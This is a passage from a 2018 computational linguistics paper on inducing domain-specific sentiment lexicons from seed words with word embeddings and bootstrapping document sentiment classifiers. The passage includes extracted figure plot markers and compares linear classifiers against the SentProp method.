senti- ment lexicon from just a few typical senti- ment words (“seeds”). An important finding is that simple linear model based supervised learning algorithms (such as linear SVM) can actually work better than more sophis- ticated semi-supervised/transductive learning algorithms which represent the state-of-the- art technique for sentiment lexicon induction. The induced lexicon could be applied directly in a lexicon-based method for sentiment clas- sification, b ut a h igher p erformance c ould be achieved through a two-phase bootstrapping method which uses the induced lexicon to as- sign positive/negative sentiment scores to un- labeled documents first, a nd t hen u ses those documents found to have clear sentiment sig- nals as pseudo-labeled examples to train a document sentiment classifier v ia supervised learning algorithms (such as LSTM). On sev- eral benchmark datasets for document senti- ment classification, our end-to-end pipelined approach which is overall unsupervised (ex- cept for a tiny set of seed words) outper- forms existing unsupervised approaches and achieves an accuracy comparable to that of fully supervised approaches. 1 Introduction Sentiment analysis (Liu, 2015) is a popular research topic which has a wide range of applications, such as summarizing customer reviews, monitoring social media, and predicting stock market trends (Bollen et al., 2011). A basic task in sentiment analysis is to classify the sentiment polarity of a given piece of text (document), i.e., whether the opinion expressed in the text is positive or negative (Pang et al., 2002), which is the focus of this paper. There are many different approaches to senti- ment classification in the Natural Language Process- ing (NLP) literature — from simple lexicon-based methods (Ding et al., 2008; Thelwall et al., 2010; Thelwall et al., 2012) to learning-based approaches (Pang and Lee, 2004; Turney, 2002; Jo and Oh, 2011; Argamon et al., 2007; Lin and He, 2009), and also hybrid methods in between (Mudinas et al., 2012; Zhang et al., 2011). No matter which ap- proach is taken, a sentiment classifier built for its target domain would work well only within that spe- cific domain, but suffer a serious performance loss once the domain boundary is crossed. The same word could drastically change its sentiment polarity (and/or strength) if it is used in a different domain. For example, being “small” is likely to be negative 269 Transactions of the Association for Computational Linguistics, vol. 6, pp. 269–285, 2018. Action Editor: Diana McCarthy. Submission batch: 11/2017; Revision batch: 2/2018; Published 5/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. for a hotel room but positive for a digital camcorder, being “unexpected” may be a good thing for the end- ing of a movie but not for the engine of a car, and we will probably enjoy “interesting” books but not nec- essarily “interesting” food. Here, the domain could be defined not by the topic of the documents but by the style of writing. For example, the meanings of words like “gay” and “terrific” would depend on whether the text was written in a historical era or modern times. When we need to perform sentiment classifica- tion in a new domain unseen before, there are usu- ally neither labeled dictionary available to employ lexicon-based sentiment classifiers nor labeled cor- pus available to train learning-based sentiment clas- sifiers. It is, of course, possible to resort to a general- purpose off-the-shelf sentiment classifier, or a pre- built one for a different domain. However, the ef- fectiveness would often be unsatisfactory because of the reasons mentioned above. There have been some studies on domain adaptation or transfer learn- ing for sentiment classification (Blitzer et al., 2007; Tan et al., 2009; Pan et al., 2010; Glorot et al., 2011; Yoshida et al., 2011; Bollegala et al., 2013; Xia et al., 2013; Yang and Eisenstein, 2015), but they still require a large amount of labeled training data from a fairly similar source domain, which is not always feasible. Those algorithms also tend to be computational-expensive and time-consuming (Mo- hammad and Turney, 2010; Fast et al., 2016). In this paper, we propose an end-to-end pipelined nearly-unsupervised approach to domain-specific sentiment classification of documents for a new domain based on distributed word representations (vectors). As shown in Fig. 1, the proposed approach consists of three main stages (components): (1) domain-specific sentiment word embedding, (2) domain-specific sentiment lexicon induction, (3) domain-specific sentiment classification of doc- uments. Briefly speaking, given a large unlabeled corpus for a new domain, we would first set up the vector space for that domain via word embedding, then induce a sentiment lexicon in the discovered vec- tor space from a very small set of seed words as well as a general-purpose lexicon, and finally exploit the induced lexicon in a lexicon-based document sentiment classifier to bootstrap a more effective learning-based document sentiment classifier for that domain. The second stage of our approach out- performs the state-of-the-art unsupervised method for sentiment lexicon induction (Hamilton et al., 2016), which is the most closely related work (see Section 2). The key to the superior performance of our method compared with theirs is the insight gained from our first stage that positive and neg- ative sentiment words are largely clustered in the domain-specific vector space but these two clus- ters have a non-negligible overlap, therefore semi- supervised/transductive learning algorithms could be easily misled by the examples in the overlap and would actually not work as well as simple super- vised classification algorithms. Overall, the docu- ment sentiment classifier resulting from our nearly- unsupervised approach does not require any labeled document to be trained, and it can outperform the state-of-the-art unsupervised method for document sentiment classification (Eisenstein, 2017). The source code for our implemented system and the datasets for our experiments are open to the research community1. The rest of this paper is organized as follows. In Section 2, we review previous studies on this topic. In Sections 3 to 5, we describe the three main stages of our approach respectively. In Section 6, we draw conclusions and discuss future work. 2 Related Work Most of the early sentiment analysis systems took lexicon-based approaches to document sentiment classification which rely on pre-compiled sentiment lexicons (Owsley et al., 2006). Various methods have been proposed to automatically produce such sentiment lexicons (Hu and Liu, 2004; Ding et al., 2008). Later, the focus of research shifted to learning-based approaches (Pang et al., 2002; Pang and Lee, 2004), as supervised learning algorithms usually deliver a much higher accuracy in senti- ment classification than pure lexicon-based meth- ods. However, lexicons have not completely lost their attractiveness: they are usually easier to un- derstand and to maintain by non-experts, and they can also be integrated into learning-based sentiment classifiers (Mudinas et al., 2012; Eisenstein, 2017). 1https://goo.gl/8K9PbE 270 Unlabeled Training Documents Word Embeddings Sentiment Lexicon Pseudo-labeled Training Documents Probabilistic Word Classifier Sentiment Seeds Lexicon-based Sentiment Classifier Learning-based Sentiment Classifier Unlabeled Test Documents Classified Test Documents Figure 1: Our nearly-unsupervised approach to domain-specific sentiment classification. The lexicon-based sentiment classifier used in our experiments is a publicly-available system called pSenti2 (Mudinas et al., 2012). In addition to a customizable sentiment lexicon, it also uses shallow NLP techniques like part-of-speech (POS) tagging and the detection of sentiment inverters and other modifiers (intensifying and diminishing adverbs). The introduction of modern word embedding techniques like word2vec (Mikolov et al., 2013) and GloVe (Pennington et al., 2014) have opened the possibility of new sentiment analysis methods. Given a large unlabeled corpus, such techniques can learn from word co-occurrence information and pro- duce a vector space of hundreds of dimensions, with each word being assigned a corresponding vector. The resulting vector space helps in understanding the semantic relationships between words and al- lows grouping of words based on their linguistic similarities. Recently Rothe et al. (2016) proposed the DENSIFIER method that can reduce the dimen- sionality of word embeddings without losing seman- tic information and explored its application in vari- ous domains. For the SemEval-2015 task (Rosenthal et al., 2015), DENSIFIER performed slightly worse compared to word2vec, though its training time was shorter by a factor of 21. In fact, previous studies such as (Rothe et al., 2016; Cliche, 2017) suggest that word2vec usually provides the best word em- beddings for sentiment analysis tasks. In their recent work, Hamilton et al. (2016) 2https://goo.gl/pj4XAQ demonstrated that by starting from a small set of seed words and conducting label propagation over the lexical graph derived from the pairwise prox- imities of word embeddings, they could induce a domain-specific sentiment lexicon comparable to a hand-curated one. Intuitively, the success of their method named SentProp requires a relatively clear separation between sentiment words of opposite po- larity in the vector space which, as we will show later, is not very realistic. Moreover, they have fo- cused on the induction of sentiment lexicons alone, while we are trying to design an end-to-end pipeline that can turn unlabeled documents in a new do- main directly to their sentiment classifications, with domain-specific sentiment lexicon induction as a key component. Recent advances in deep learning (LeCun et al., 2015) has elevated sentiment analysis to new perfor- mance levels (Kim, 2014; Dai and Le, 2015; Hong and Fang, 2015). As reported by Dai and Le (2015), the Long Short-Term Memory (LSTM) (Hochreiter and Schmidhuber, 1997) Recurrent Neural Network (RNN) can reach or surpass the performance lev- els of all previous baselines for sentiment classifi- cation of documents. One of the many appeals of LTSM is that it can connect previous information to the current context and allow seamless integration of pre-trained word embeddings as the first (projec- tion) layer of the neural network. Moreover, Rad- ford et al. (2017) discovered the “sentiment unit”, the single unit which can learn the perfect represen- tation of sentiment, in a multiplicative LSTM with 271 4096 units, despite the fact that the LSTM was only trained for a completely different purpose — to pre- dict the next character in the text of Amazon re- views. Our results are in line with those findings and confirmed the superiority of LSTM in building document-level sentiment classifiers. Zhang et al. (2011) tried to address the low re- call problem of lexicon-based methods for Twitter sentiment classification via training a learning-based sentiment classifier using the noisy labels generated by a lexicon-based sentiment classifier (Ding et al., 2008). Although the basic idea of their work is similar to what we do in the third stage of our ap- proach (see Section 5), there exist several notable differences. First, they adopted a single general- purpose sentiment lexicon provided by Ding et al. (2008) and used it for all domains, while we would induce a different lexicon for each different domain. Consequently, their method could have a relatively large variance in the document sentiment classifica- tion performance because of the domain mismatch (e.g., F1 = 0.874 for the “Tangled” tweets and F1 = 0.647 for the “Obama” tweets), whereas our approach would perform quite consistently over dif- ferent domains. Second, they would need to strip out all the previously-known opinion words in their single general-purpose sentiment lexicon from the training documents in order to prevent the training bias and force their document sentiment classifier to exploit domain-specific features, but doing this would obviously lose the very valuable sentiment signals carried by those opinion words. In contrast, we would be able to utilize all terms in the training documents, including those opinion words that ap- peared in our automatically induced domain-specific lexicons, as features, when building our document sentiment classifiers. Third, they designed their method specifically for Twitter sentiment classifica- tion, while our approach would work for not only short texts such as tweets (see Section 5.2) but also long texts such as customer reviews (see Sec- tion 5.1). Fourth, they had to use an intermediate step to identify additional opinionated tweets (ac- cording to the opinion indicators extracted through the χ2 test on the results of their lexicon-based sen- timent classifier) in order to handle the neutral class, but we would not require that time-consuming step as we would use the calibrated probabilistic outputs of our document sentiment classifier to detect the neutral class (see Section 5.3). 3 Domain-Specific Sentiment Word Embedding Our approach to domain-specific document-level sentiment classification is built on top of word em- beddings — distributed word representations (vec- tors) that could be learned from an unlabeled corpus to encode the semantic similarities between words (Goldberg, 2017). In this section, we investigate how the embed- dings of sentiment words for a particular domain would look like in the domain-specific vector space. To ensure a fair comparison with the state-of-the- art sentiment lexicon induction technique SentProp3 (Hamilton et al., 2016) later in Section 4, we adopt the same publicly-available pre-trained word em- beddings for the following three domains together with the corresponding sets of sentiment words (i.e., sentiment lexicons). • Standard-English. We use the the Google News word embeddings4 and the ‘General Inquirer’ lex- icon (Stone et al., 1966) with the sentiment polar- ity scores collected by Warriner et al. (2013). • Twitter. We use the word embeddings constructed by Rothe et al. (2016) and the sentiment lexicon from the SemEval-2015 Task 10E (Rosenthal et al., 2015). • Finance. We use the word embeddings learned us- ing an SVD-based method (Manning et al., 2008) from a collection of “8-K” financial reports5 (Lee et al., 2014) and the finance sentiment lexicon hand-crafted by Hamilton et al. (2016). Note that the above three sentiment lexicons would be used for both the inspection of sentiment word distributions in this section and the evaluation of sentiment lexicon induction later in the next sec- tion. Furthermore, to facilitate a fair compari- son with the state-of-the-art unsupervised document sentiment classification technique ProbLex-DCM6 (Eisenstein, 2017) later in Section 5, we also adopt the following two document collections which they have used. 3https://goo.gl/BFkY8N 4https://goo.gl/5r79l6 5https://goo.gl/7ntr2V 6https://goo.gl/Qr993F 272 • IMDB. We use 50k movie reviews in English from IMDB (Maas et al., 2011) with 25k labeled training documents. • Amazon. We use about 28k product reviews in English across four product categories from Ama- zon (Blitzer et al., 2007; McAuley and Leskovec, 2013) with 8k labeled training documents. The word embeddings for the above two domains were trained by us on the respective corpora us- ing word2vec (Mikolov et al., 2013) which employs a two-layer neural network and is by far the most widely used word embedding technique. Specifi- cally, we ran word2vec with skip-gram of a five- word window to construct word vectors of 500 di- mensions, as recommended by previous studies7. The sentiment lexicon made by Liu (2015) is consis- tently one of the best for analyzing reviews (Ribeiro et al., 2016), so it is used for both of those domains. Drawing an analogy to the well-known cluster hy- pothesis in Information Retrieval (IR) (Manning et al., 2008), here we put forward the cluster hypothe- sis for sentiment analysis: words in the same cluster behave similarly with respect to sentiment polarity in a specific domain. That is to say, we expect pos- itive and negative sentiment words to form distinct clusters, given that they have been represented in an appropriate vector space. To verify this hypothesis, it would be useful to visualize the high-dimensional sentiment word vectors in a 2D plane. We have tried a number of dimensionality reduction tech- niques including the t-distributed Stochastic Neigh- bor Embedding (t-SNE) (van der Maaten and Hin- ton, 2008), but found that simply using the clas- sic Principle Component Analysis (PCA) (Bishop, 2006) works very well for this purpose. We have found that in general, the above cluster hypothesis holds for word embeddings within a spe- cific domain. Fig. 2a shows that in the Standard- English domain, the sentiment words with opposite polarities would form two distinct clusters. How- ever, it can also be seen that those two clusters would overlap with each other. That is because each word carries not only a sentiment value but also its linguis- tic and semantic information. Zooming into one of the word vector space regions (Fig. 2b) can help us understand why sentiment words with different po- 7https://goo.gl/SyAdej − − + + − − − − + + + + − − − − − + − − + − − − + − + − + − − − + + + + − + − − − + + + + − + + − + + − + − − + −− − + − − − + + − − + + − + − + − + − + − + + + − + + − + − + − − + − − − + + − − − − − + − − − − − + − − − + − + + − + + + + − + + − + − − − − − + + + + + + − − − − + − − − + − − − − + − + − −− − + + − + + + − + − + − − − − + − − + + + + − − + − + − − − + + + + − − − − − + − + + + − − + − − − − − − + + − − + − − + + − − −+ + −− − + − − + − − + − − + − − + + + + − − − − − − − + − −+ − − − − −+ − − − + − + − + + + + + + − − − − − + − − − − + + + − − + − + + − − − + + + − − + + + − − − − − + + + + + − + + − − − + + − −+ − − − − + − − + − + − − + − + − − + − − − − − − + − − − − − + − − − − − − − − − + − + −+ + − − − − + − − + + + − − + − − + + + − − − + − − + − + + + + − + + + + + − − − − + − + + + − −+ + − − − + − + − − − + + − + − + + + − − − − − − + − + − − − − − + − − − − − − − + − + − + + − −− − − − − − − + − + − + − − + + − − − − − + − − + + + − + + − − − + + − + − − − − − − − − − − − − − − − + − − + − + − + − + + + − − − − − − + − − − − − − − − − − − + − − − + + − − − + − − − −+ − + + + − − − + −+ − − − + − + − − + − + − − − − −+ + − + + − + − − − + − − + + − + + − − − − − − + − − − − + + − + + + − − + ++ + − + + − − + + − + + − − − + + − + − − − + + − − − − + − + − − − + − + − + − − − + + − − + − + + − + + − − + + + + − + − + − − − + − + − + − − − − − + + + + − + − + − + + − − + + − + + − − + − − + − − − − ++ − − + − − − − + − + + + − + + − + − + + + − − − − − − + − − − − − − − − − − + − + − + − − + − − + − − + + − + − + − − + − −− − + − + − − + − + − − + − + − − − + − − + − − − − − + + + + − + − − − + − − + − − + −− − − − − − − − + − + − − − − − − − − + − + − + + + − + − − − + + − − − − − + − + − + + − − − − − − − − + + − − − + − − − + − − − + − + − + − − − − − − + + + − + − − + − + + + − + − − − + + + − + − − + − − − − + + − − + − − − − − − − + − + − − − + − + + − + − − − − + − − − − + − + + − + + + − + − − − − − − − + − + + + − + + + − − + − − − − + − − − − + − + − − − + − + − + + − + + − + − − − − + + − − − − + − + − − − + + + − − − + + − − + − − − − −+ − + + − − + − − − − − − − − − − + − − − + − − + − + − −+ − + − − − − − − − + + + + + + + − + − − − − − + − − + − + − − − + − − + + + − − + − + + − − − − − − − − + − + − − − − − − − + − − + − + + − −+ + −− + − − − − − − − − − − + − + − + − + − − + − − − − − − − + − + + − + − − + + − − − − − − − − + − + − − + − − − − − + + − − + + + − − − + − − + − − + + − + + − − + − + + + + − + − − − − + + − + − − + − + + − − + + − + − − − − + − − + + − − + − − − − + − − − + − + − − + − − −+ + − + − − − + − + − + − − + − − + − − − + −+ + + + − − + − + − + + − + − − − + + − + − + − + − − − − + − + − + + − + − + + − − − + + − + − − − − − − − − + − + − + + + − − − − − + − − + − − − − + − − − − + + + − − − − + − − − − − − − + + − − − − − − − − + − − − − + − + + + − − + − + + + + + − − + − − − − + − + + + − − + − − − + + − + − + − + − − − − − + − − − − − − + + − + + + − − − − − − + − + − + + + + + − − − − − − + − − + + + + + − + − − − + + + − − + + + − − − − + − + − + ++ − ++ − + − − − + − − − − − − − + − − − − − + −− + − − − + − − − − + − − − − − + − − + − + + + + + + − + − − − − − + − −− ++ ++ + − + − − + − − − + + − + − − + − + − − − − − + − + − − − − + + − + − − + − − − − − + + + − − − − + − + + + − − − + + − − + − − + − − + + + + − − + − + − − + + − − + + + − + − − − − − + − − + + − − − + + − − + − + − −+ + + − + − − + − − − + − − + + − − + − + + − − − − −− + − − + − − + − + − − − + − + − + − + + − + − + + + + + + − + − − − + + + − + − − − − + − − − − + − + − + + − + + + − − + − + − − + + + − − + + + + + − + − − − + − − + − + − + + + + − − − − − − + − + + − − + − − + + − + + − + − − + − + + + − + − − − + − − + + − − − − − − + − − + − − + − + − − − − + + + + + + − − + − − + − + − + − − − − − + − ++ − − + + − − − + + + − − − − − + − + − −+ + − − − − − + − + − − + + + − − + − − + − − + − + − + − + − + − − + + + + + + + − − + − + − − − − + − − + + − − − − + − − + + − − ++ − − − − − + + −− − − + + − + − − + + − − + − + − − − + + − + − − + + − + + − − + + −− − − − + −− − − + + − − − + − − + − + − − + − − − + − − + − + + − − + + − − − − + − − + − − + − + + − − + −− − − − + − − − − − − − − + − + + − + + + + − − − + − − − − − − − − −+ + + − − + − + − − − − − − −+ + −− − −− − + − + − + − − − − − − + − − ++ + + − + − − − + − − + + + − − + − − − − + − − + + + + − − − − − − + − + + − − − + − + − + − − − + − − + + + − + − − − − − − + ++ + − − − + + − + + − − − − − + − − − + − − + − − − − + − − − + + − + + + + − + + + + − − − − − + − + − − + − − − + + − − − − ++ − + − + − − + − − − + − − − − + − − + + + + − − − + + − + − − − + − − + − − + − − + + + −+ − + − + − − − + + + + − − − + + − − − + + −− − + + − − − − + − + − − − + − + + − + − + − + + + −− − − + + + − − + − + − − − − + − − − + − + − − − + − −1 0 1 −1 0 1 (a) The global vector space showing two clusters. (b) A local region of the vector space zoomed in. Figure 2: Visualisation of the sentiment words in the Standard-English domain. larities could be grouped together: ‘hail’, ‘stormy’ and ‘sunny’ are linguistically similar as they all de- scribe weather conditions, yet they convey very dif- ferent sentiment values. Moreover, as described by (Plutchik, 1984), sentiment could be grouped into multiple dimensions such as joy–sadness, anger– fear, trust–disgust and anticipation–surprise. Putting that aside, certain sentiment words can be classified sometimes as positive and sometimes as negative, depending on the context. These reasons lead to the phenomenon that many sentiment words are located in the overlapping noisy region between two clusters in the domain-specific vector space. On visual inspection of the Finance (Fig. 3a) sen- timent words and IMDB (Fig. 4a) sentiment words in their respective vector spaces, we can see that pos- itive and negative words form distinct clusters which are largely separable. However, if we consider Fi- nance sentiment words in the IMDB vector space (see Fig. 3b), positive and negative words would be mixed together and could not be separated easily. One may be surprised that positive and negative sentiment words form their respective clusters, be- cause most of the time they could be used in ex- 273 − − + − + − + − − +− − + − − + − − − − − + − − + − + − − − − − + + − + − − − − − + − − − − − − + + − − − − + − + + − + −− − − − + − + + − − − + + − − + + + − + − + − − − − + + + − + − −− − − − − − +− + − − − − − − + − − − +− − − − + − + − + − + − + − + − − + − + − − − − − − + − − + − − − − − − − − − + − − − + − + − + −+ − − + − − − − + + + − − − − − + − − + + − − − −− − − + − − − − − + − − − + + − − + − − − − − − − −− − − − − − + − − − − − − − + − − − − − − − + − + − − − + − + − − − − + − − + − − + + + + − − − − − − − − − + − − + − − + − − − − + + + + − − + − − − − − − − − − − + − − + − − − − − + − + − + − +− − − − − − − − − − − − + −− + + + − − + − + − − − − − − − + + − − − + − + − − − + − + + − − − + − − + − − +− + − − − − − − + − − − − − − − − − + − − ++ + − − − + − − + − +− − − − − −10 0 10 20 −20 −10 0 10 20 (a) In the Finance (same domain) vector space. −+ − − + − − + − − − + − − − − + − + − − − + − − + − − + + − − − + −− − −− − − − − + − − + + − − − − − − − − − −− + − − + + −+ − + − + − − + − − − − − − − + − − − − − − − − − − + + − −− − − − + − − + − + − − + − + − − − − − − − − − − − + + − − + + − − + + − − − − − − − + − + − − − − −+ − + − − − − + − +− −+ + − − − + − +− − − + − − − + − − + − − + − + − + − − − − − + + − − + − − + −− − − + − − − − + − − − − − −+ + − − − − + − − + − − − − −− − − − −+ + − − + − − − − − − − + + − −+ − − + − − − + − − − − − − −− −−− − + − − + − − − − − + + − − − − + − − − + − − + + − − + − − − + − − − − − + + − − + + − − − + + − + − −− − − − − − − − − − − − − − − +− − − − − − − − − − − − − + − − − − − − − − + − − − − + − − − − − − − − + − − − − − + − − − − − − − + − − − + − − − − − − − − − − − − − − + + + −− − − − − − − + − + + + − − − − − − + + − + − + − − − − − − + − + − − + − − + − + + − + − − − − − + − − − − − − − − − − − − − + − − + + −+ − − − + − − − + − − − − − + − + − + − − − − − + − − − − − − − − −− − − + − − − − − −+ + + − + + − + − + − − − − + − − − − + − − − + − − − − − − + − − − − − − − − + − − − + + + − − − + + − − + − − − + − − − − − − − − − + − + + − − − − − − − − − + −+ − − − + − − + − + − + − + − − − − − − −+ + − − − − − + − − − − − − + − − − − + − + − − − − − − + − − − − + + − + − − − + + − + + + − − − + − + − −− + − + − + − − −+ + − + − − − − + − − −5 0 5 10 15 −15 −10 −5 0 5 (b) In the IMDB (different domain) vector space. Figure 3: Sentiment words of Finance in the same/different domain vector space. − − + − − + − + −− + − + − −− + − + + + + + + + + + − + − − − − − + + + − − + + − + + − + − − − − + + + + + − − − + − + + − − − − + − + − + − − + + + + + + − − + + + − + + + − + + − + − + − + + + + + + + + − + + + − + + − − − − − − + − − − + + − − + − − + + − − + − + + − + + − − − + − + + ++ − − + − + + + + − + + + − − − − + − − + − + − − + + + − − + + + − − + − + − + − + + − − + − − − − + − + + −− + + − + + + + − − + − − + − − − + − − − + − + − + − − − − − + + − + − − + + + − + − + − − − + + + + − − + − + + + − + + + + − + + − − + −− + − − − − − − + + − −− − − + + − − + + − − + + − − − − − + − − + − − − + + + − − − − − − + + − + + + − − − + − + + + + − − − + − − + + + + − − + − + − − − − + − − + + − − − − + + − + − − + + + − − − + + − − + + − + − − − −+ + + + + − + − − − + + − + − − + − − + − + + + − + + + − − − − − − − + − + − + − − + + + ++ − + − − + + + + +− + + − + − − + − + − − + − + − + + − − − − + − + + − + + − + − − + − − − + + − + + + + − + − − − −− − − − + − + + − − + − − − + + − + + + + − −+ − − − − − + − + + + + + − − + + + − + − − + + − + + − + + + + − − + − − − − − − − − + + + − + − + − + + + + + + + − − − − − + + + −+ + + + + − − − − + + + + + − − − − − − − + − + + − − + − − − − + − + − − + − − − − + + + + − + − − − − + − − + − + − + − + − − + + − − + + − − − + − +− − − + − − − + − − + + + + − + + − − + + + + − − + + − + + + + − + − − −+ − − + + + + − + + − − + − − + − − − − + − − + − + + + − + + − + − − − + + − − − + + − − + + − − + − − + + − − + + − + + + − − + + + + + + − − − + − − − − − + − + − − −+ − + + − − − − − + − − − + − + + − − + − − − + − − − − − + − − + + − + − − + + − − − − + − + + + + + + + + − + + + − + + + + − − − + − − + + − − + + − − − + − − − − − + − + + + − + + − ++ + − − + + − − + + − + + + − − + + − − + − + + + − − − − + −+ −− + − − + − − − + + + + − − − + + − + + − + − + − + − − − + + + − − + − − − + + + + + + + − − + + −− + + − − − − − − − + − + − − − − − − + + + + − − + + + − − + + − + + − + − + − + − + + + − − + − + − + + − − + − + + + + − − + + − + + + − − − + + + − + − − − + − + + − + − + − − − + + + − + + − + + − − + − + + + − + − − + − + − − − + − − − + − − − + + − + + + − − − − + + − − − −+ + − + + − + + + + − + − + + − + + + − − − + + − − + − + + + − − + − − + + − + + + − − − + − + − + − − + + −− − + + +− + − + + − + + + − − + + + − + + + − + − − − −− − + − − + − − − − − + − + − + + − + − − + − − − − + + − + + + + − + −+ − + + − + − + − + − + − + + −+ − + + + + + + − + + + + − + − −+ − + − + −+ ++ + + + + − + − − − − + + + + − − − − − + + − + + + + + + + + − − − − + − + + − − − + + + − + + − + + + + + + − + − − + − + + + −+ + + − − − + − + + + + − + − − + + − + − −+ + + + + − + − + − − + + + − − + − + + + − + + − − + − +− + − + − − − + − + − + − − − + + − − − − + − + − −+ + + + + + − + − − + + − − − + + + + + + + + + − − − + + + + + −+ + − − − + − + + + + − + − − − − − + + − + − + + − + − + − + + − + − − + − − − − − + − + + − + − − + + + − + − − − + − − + + − + + − + + − − − − − − + − − − − − − − − + − + − +− − + − − + + − −10 −5 0 5 10 −10 −5 0 5 10 (a) Original/Full. − − + + + − − + − −+ + + + − + − + + − −+ + + − + − + + + + − − + + + − − + + − + − + − + − − + − + − + − − + − − + − − − − + + − − − −− + + + + − − − − + − + + − + −− − + − − − − + − + + − − − + + − − − + + + + − + + + + + + + + − − − + − + + − + + − − − − − − − + + + − + + + − + − + − + + + − − − − − − + − − + − + − − − − + − − ++ +− − + + −− + − − − + + − + − + + + + − − − − − − − − − − +++ + − + + − − − + + − + + + + + + − − + + − − − − − + + − + + − − − + + − + + − − − + + − + + − − − + + + + + − − − − + − − + + + − + + − + + − + − + − − + + − + −+ − − − − − − − + + + − − + + + + − + + − − + − + + + − − − − − − + − + − + + + − + − − + − + − − − − − − + + + − + + + − + − + − + − + − − + − + − + − − + + − + + + + − − − − + − − −10 −5 0 5 10 −10 −5 0 5 10 (b) Filtered. Figure 4: Sentiment words about movies in the IMDB vector space before/after filtering. actly the same context which might suggest that they would result in similar word embeddings. For exam- ple, we could say “the room is good” and also “the room is bad”: both are legitimate sentences. The probable reason for the cluster hypothesis to be true is that in reality people tend to use positive sentiment words together much more often than to mix them with negative sentiment words, and vice versa. For example, it would be much more often for us to see sentences like “the room is clean and tidy” than “the room is clean but messy”. It is a long established fact in computational linguistics that words with similar meanings tend to occur nearby each other (Miller and Charles, 1991); sentiment words are no excep- tion (Turney, 2002). Moreover, it has been widely observed that online customer reviews are affected by the so-called love-hate self-selection bias: users tend to rate only products which they either like or hate, leading to a lot more 1-star and 5-star ratings than other (moderate) ratings; if the product is just 274 average or so-so, they probably will not bother to leave reviews. The polarization of online customer reviews would also encourage the clustering of sen- timent words into opposite polarities. 4 Domain-Specific Sentiment Lexicon Induction Given the word embeddings for a specific do- main, we can induce a customized sentiment lexi- con from a few typical sentiment words (“seeds”) frequently used in that particular domain. Such an induced domain-specific sentiment lexicon plays a crucial role in the pipeline towards domain-specific document-level sentiment classification. Table 1 shows the seed words for five different do- mains which are identical to those used by Hamilton et al. (2016) except for the two additional domains IMDB and Amazon. The induction of a sentiment lexicon could then be formulated as a simple word sentiment classification problem with two classes (positive vs. negative). Each word is represented as a vector via domain-specific word embedding; the seed words are labeled with their correspond- ing classes while all the other words (i.e., “candi- dates”) are unlabeled; the task here is to learn a clas- sifier from the labeled examples first and then apply it to predict the sentiment polarity of each unlabeled candidate word. The probabilistic outputs of such a word sentiment classifier could be regarded as the measure of confidence about the predicted sentiment polarity. In the end, those candidate words with a high probability of being either positive or negative would be added to the sentiment lexicon. The final induced sentiment lexicon would include both the seed words and the selected candidate words. As pointed out by Mudinas et al. (2012), if we simply consider all words from the given corpus as candidate words, the above described word senti- ment classifier tends to assign sentiment values not only to the actual sentiment words but also to their associated product features or more generally the as- pects of the expressed view. For example, if a lot of customers do not like the weight of a product, the word sentiment classifier may assign strong nega- tive sentiment to “weight”, yet this is not stable — the sentiment polarity of “weight” may be different when a new version of the product is released or the customer population has changed, and furthermore it probably does not apply to other products. To avoid this potential issue, it would be necessary to consider only a high-quality list of candidate words which are likely to be genuine sentiment words. Such a list of candidate words could be obtained directly from general-purpose sentiment lexicons. It is also possi- ble to perform NLP on the target domain corpus and extract frequently-occurring adjectives or other typi- cal sentiment indicators like emoticons as candidate words, which is beyond the scope of this paper. To examine the effectiveness of different ma- chine learning algorithms for building such domain- specific word sentiment classifiers, we attempt to recreate known sentiment lexicons in three domains: Standard-English, Twitter, and Finance (see Sec- tion 3), in the same way as Hamilton et al. (2016) did. Put differently, for the purpose of evaluation, we would just use a known sentiment lexicon in the corresponding domain as the list of candidate words and see how different machine learning algorithms would classify those candidate words based on their domain-specific word embeddings. For those lexi- cons with ternary sentiment classification (positive vs. neutral vs. negative), the class-mass normal- ization method (Zhu et al., 2003) used by Hamilton et al. (2016) has been applied here to identify the neutral category. The quality of each induced lex- icon for a specific domain is evaluated by compar- ing it with its corresponding known lexicon as the ground-truth, according to the performance metrics which are the same as in (Hamilton et al., 2016): Area Under the Receiver-Operating-Characteristic (ROC) Curve (AUC) for the binary classifications (ignoring the neutral class, as is common in pre- vious work) and Kendall’s τ rank correlation co- efficient with continuous human-annotated polarity scores. Note that Kendall’s τ is not suitable for the Finance domain, as its known sentiment lexicon is only binary. Therefore, our experimental setting and performance measures are all identical to those of Hamilton et al. (2016), which ensures the validity of the empirical comparison between our approach and theirs. In Table 2, we compare a number of typical su- pervised and semi-supervised/transductive learning algorithms for word sentiment classification in the context of domain-specific sentiment lexicon induc- 275 Corpus Positive Negative Standard-English good, lovely, excellent, fortunate, pleasant, delightful, perfect, loved, love, happy bad, horrible, poor, unfortunate, unpleasant, disgusting, evil, hated, hate, unhappy Twitter love, loved, loves, awesome, nice, amazing, best, fantastic, correct, happy hate, hated, hates, terrible, nasty, awful, worst, horrible, wrong, sad Finance successful, excellent, profit, beneficial, im- proving, improved, success, gains, positive negligent, loss, volatile, wrong, losses, dam- ages, bad, litigation, failure, down, negative IMDB good, excellent, perfect, happy, interesting, amazing, unforgettable, genius, gifted, in- credible bad, bland, horrible, disgusting, poor, banal, shallow, disappointed, disappointing, lifeless, simplistic, bore Amazon IMDB domain seeds (as above) plus positive, fortunate, correct, nice IMDB domain seeds (as above) plus negative, unfortunate, wrong, terrible, inferior Table 1: The “seeds” for domain-specific sentiment lexicon induction. tion: • kNN — k Nearest Neighbors (Hastie et al., 2009), • LR — Logistic Regression (Hastie et al., 2009), • SVMlin — Support Vector Machine with the lin- ear kernel (Joachims, 1998), • SVMrbf — Support Vector Machine with the non- linear RBF kernel (Joachims, 1998), • TSVM — Transductive Support Vector Machine (Joachims, 1999), • S3VM — Semi-Supervised Support Vector Ma- chine (Gieseke et al., 2012), • CPLE — Contrastive Pessimistic Likelihood Es- timation (Loog, 2016), • SGT — Spectral Graph Transducer (Joachims, 2003), • SentProp — a label propagation based classifica- tion method proposed for the SocialSent system (Hamilton et al., 2016). The suitable parameter values of the above learning algorithms (such as the C for SVM) are found via grid search with cross-validation, and the probabilis- tic outputs are given by Platt scaling (Platt, 2000) if they are not provided by the original learning algo- rithm. The experimental results shown in Table 2 demonstrate that in almost every single domain, simple linear model based supervised learning al- gorithms (LR and SVMlin) can achieve the op- timal or near-optimal accuracy for the sentiment lexicon induction task, and they outperform the state-of-the-art sentiment lexicon induction method SentProp (Hamilton et al., 2016) by a large mar- gin. The performance improvements are statisti- cally significant (p-value < 0.05) according to the sign test. There does not seem to be any benefit of utilizing non-linear models (kNN and SVMrbf ) or semi-supervised/transductive learning algorithms (TSVM, S3VM, CPLE, SGT, and SentProp). The qualitative 